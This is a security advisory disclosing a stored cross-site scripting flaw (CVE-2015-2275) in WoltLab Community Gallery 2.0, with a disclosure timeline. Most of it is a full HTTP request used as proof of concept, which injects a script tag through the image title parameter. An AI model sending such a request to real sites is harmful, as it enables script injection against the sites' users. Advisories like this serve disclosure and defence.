Community Gallery 2.0 Cross Site Scripting

`#Vulnerability title: Community Gallery - Srored Corss-Site Scripting  
vulnerability  
#Product: Community Gallery  
#Vendor: https://www.woltlab.com  
#Affected version: Community Gallery 2.0 before 12/10/2014  
#Download link:  
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery  
#Fixed version: Community Gallery 2.0 after 12/26/2014  
#CVE ID: CVE-2015-2275  
#Author: Pham Kien Cuong ([email protected]) & ITAS Team (www.itas.vn)  
  
  
::PROOF OF CONCEPT::  
  
+ REQUEST:  
POST  
/7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512  
d9eed HTTP/1.1  
Host: target  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101  
Firefox/36.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/  
Content-Length: 1300  
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3;  
__cfduid=dceb0da13e569549c9531d07b3d287acb1420598620  
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje  
ctIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5  
D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%  
5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%  
5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5  
D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7  
%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5B  
data%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D  
=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%  
5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5  
D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5  
D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde  
mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&  
parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%  
3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788  
bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5  
D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisE  
dit%5D=1  
  
  
- Vulnerable parameter: parameters[data][7][title]  
  
  
::DISCLOSURE::  
+ 12/10/2014: Detect vulnerability  
+ 12/10/2014: Send the detail vulnerability to vendor  
+ 03/11/2015: Public information  
  
::REFERENCE::  
-  
http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu  
rning-board-community-gallery-77.html  
  
  
::DISCLAIMER::  
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF  
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY  
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE  
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS  
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION  
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,  
AND AT THE USER'S OWN RISK.  
  
  
--------------------------------------------  
ITAS Team (www.itas.vn)  
  
  
`